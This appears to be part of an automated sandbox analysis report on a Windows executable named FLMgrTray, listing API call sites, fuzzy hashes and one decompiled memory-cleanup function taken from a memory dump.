                                                                                        0x0016426e
                                                                                        0x0016426e

                                                                                        APIs
                                                                                        • ?_Xout_of_range@std@@YAXPBD@Z.MSVCP140(invalid string position,001645EE,00000000,?,2C80D730,?,?,?,?,2C80D730,?,2C80D730,?,?,?), ref: 00164215
                                                                                        • memset.VCRUNTIME140(00000000,?,?,?,?,2C80D730,?,?,?,2C80D730,?,?,?,?,2C80D730), ref: 0016425A
                                                                                        • memcpy.VCRUNTIME140(00000000,?,2C80D730,00000001,?,2C80D730,?,2C80D730,?,2C80D730), ref: 001642F5
                                                                                        • memset.VCRUNTIME140(2C80D730,?,2C80D730,00000000,?,2C80D730,00000001,?,2C80D730,?,2C80D730,?,2C80D730), ref: 00164301
                                                                                        Strings
                                                                                        • invalid string position, xrefs: 00164210
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: memset$Xout_of_range@std@@memcpy
                                                                                        • String ID: invalid string position
                                                                                        • API String ID: 1662975789-1799206989
                                                                                        • Opcode ID: 2d6422b44e09cdfaddea93f88e7bc67dd9578e8ebaa356cf3d8ab0caaf0bc765
                                                                                        • Instruction ID: 1db4aee1080daa97e4e14da91f9d0b120500e7c82def3ff7d4e970558fac81da
                                                                                        • Opcode Fuzzy Hash: 2d6422b44e09cdfaddea93f88e7bc67dd9578e8ebaa356cf3d8ab0caaf0bc765
                                                                                        • Instruction Fuzzy Hash: 39F0C235B006146FC304EF6C9C809AAFBE9FF99340B144126F918C3701D371AA6087E0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,013C1C50,2C80D730,?,?,00168E3A,2C80D730,013C1C50,2C80D730,?,76F845B0), ref: 00165E1A
                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(?,?,013C1C50,2C80D730,?,?,00168E3A,2C80D730,013C1C50,2C80D730,?,76F845B0), ref: 00165E26
                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0(76F845B0,76F845B0), ref: 00165E3C
                                                                                        • tolower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00165E48
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: tolower
                                                                                        • String ID:
                                                                                        • API String ID: 3025214199-0
                                                                                        • Opcode ID: da71d3466bcefe3bdededc1f02bec5bc86e5357ac5d0f25bf30d4161ebbcf46b
                                                                                        • Instruction ID: 4f5e0f1011e12e92519d494e21bd6fb44f1b272d08e0d0523ad5f471181e993e
                                                                                        • Opcode Fuzzy Hash: da71d3466bcefe3bdededc1f02bec5bc86e5357ac5d0f25bf30d4161ebbcf46b
                                                                                        • Instruction Fuzzy Hash: 3421D3327006149BCF288F2CD89447DB7A7EB95350B64456EE8898B361D732DEA1CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0016B610(void** __ecx) {
                                                                                        				intOrPtr* _t17;
                                                                                        				void* _t18;
                                                                                        				int _t20;
                                                                                        				intOrPtr _t31;
                                                                                        				void* _t32;
                                                                                        				intOrPtr _t33;
                                                                                        				intOrPtr _t34;
                                                                                        				void** _t35;
                                                                                        				signed int _t37;
                                                                                        				void* _t39;
                                                                                        				void* _t40;
                                                                                        
                                                                                        				_t35 = __ecx;
                                                                                        				_t17 =  *((intOrPtr*)(__ecx));
                                                                                        				if(_t17 != 0) {
                                                                                        					if( *((intOrPtr*)(_t17 + 0x10)) != 0) {
                                                                                        						_t33 =  *((intOrPtr*)(_t17 + 4));
                                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *_t17 + 0x28)) + _t33))(_t33, 0, 0);
                                                                                        						_t17 =  *((intOrPtr*)(__ecx));
                                                                                        					}
                                                                                        					free( *(_t17 + 0x30));
                                                                                        					_t18 =  *_t35;
                                                                                        					_t40 = _t39 + 4;
                                                                                        					if( *(_t18 + 8) == 0) {
                                                                                        						L10:
                                                                                        						_t31 =  *((intOrPtr*)(_t18 + 4));
                                                                                        						if(_t31 != 0) {
                                                                                        							 *((intOrPtr*)( *((intOrPtr*)(_t18 + 0x20))))(_t31, 0, 0x8000,  *((intOrPtr*)(_t18 + 0x34)));
                                                                                        							_t18 =  *_t35;
                                                                                        						}
                                                                                        						_t20 = HeapFree(GetProcessHeap(), 0, _t18);
                                                                                        						 *_t35 = 0;
                                                                                        						return _t20;
                                                                                        					} else {
                                                                                        						_t37 = 0;
                                                                                        						if( *((intOrPtr*)(_t18 + 0xc)) <= 0) {
                                                                                        							L9:
                                                                                        							free( *(_t18 + 8));
                                                                                        							_t18 =  *_t35;
                                                                                        							_t40 = _t40 + 4;
                                                                                        							goto L10;
                                                                                        						}
                                                                                        						_t32 = _t18;
                                                                                        						do {
                                                                                        							_t34 =  *((intOrPtr*)( *((intOrPtr*)(_t32 + 8)) + _t37 * 4));
                                                                                        							_t18 = _t32;
                                                                                        							if(_t34 != 0) {
                                                                                        								 *((intOrPtr*)( *((intOrPtr*)(_t32 + 0x2c))))(_t34,  *((intOrPtr*)(_t32 + 0x34)));
                                                                                        								_t18 =  *_t35;
                                                                                        								_t40 = _t40 + 8;
                                                                                        							}
                                                                                        							_t37 = _t37 + 1;
                                                                                        							_t32 = _t18;
                                                                                        						} while (_t37 <  *((intOrPtr*)(_t18 + 0xc)));
                                                                                        						goto L9;
                                                                                        					}
                                                                                        				}
                                                                                        				return _t17;
                                                                                        			}














                                                                                        0x0016b611
                                                                                        0x0016b613
                                                                                        0x0016b617
                                                                                        0x0016b621
                                                                                        0x0016b623
                                                                                        0x0016b632
                                                                                        0x0016b634
                                                                                        0x0016b634
                                                                                        0x0016b639
                                                                                        0x0016b63f
                                                                                        0x0016b641
                                                                                        0x0016b648
                                                                                        0x0016b685
                                                                                        0x0016b685
                                                                                        0x0016b68a
                                                                                        0x0016b69a
                                                                                        0x0016b69c
                                                                                        0x0016b69e
                                                                                        0x0016b6ab
                                                                                        0x0016b6b1
                                                                                        0x00000000
                                                                                        0x0016b64a
                                                                                        0x0016b64b
                                                                                        0x0016b650
                                                                                        0x0016b676
                                                                                        0x0016b679
                                                                                        0x0016b67f
                                                                                        0x0016b681
                                                                                        0x00000000
                                                                                        0x0016b684
                                                                                        0x0016b652
                                                                                        0x0016b654
                                                                                        0x0016b657
                                                                                        0x0016b65a
                                                                                        0x0016b65e
                                                                                        0x0016b667
                                                                                        0x0016b669
                                                                                        0x0016b66b
                                                                                        0x0016b66b
                                                                                        0x0016b66e
                                                                                        0x0016b66f
                                                                                        0x0016b671
                                                                                        0x00000000
                                                                                        0x0016b654
                                                                                        0x0016b648
                                                                                        0x0016b6b8

                                                                                        APIs
                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,0016B22C,2C80D730,?,0018CAA0,000000FF), ref: 0016B639
                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 0016B679
                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0016B6A4
                                                                                        • HeapFree.KERNEL32(00000000), ref: 0016B6AB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heapfree$FreeProcess
                                                                                        • String ID:
                                                                                        • API String ID: 3425746932-0
                                                                                        • Opcode ID: 4832b9527ba66f1caefdf9e6521ddbff69dc982db683eb35d4b24903637560f2
                                                                                        • Instruction ID: 382f9b6f4b7b9e1f65ecdd6f3f1731ff657e593ef7cb3127e06b1fa2d7859d4f
                                                                                        • Opcode Fuzzy Hash: 4832b9527ba66f1caefdf9e6521ddbff69dc982db683eb35d4b24903637560f2
                                                                                        • Instruction Fuzzy Hash: 392123342002119FD764CB5CDC89F15B7E5BF48714F2980A9E909CB2A2E771ECA2CB44
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%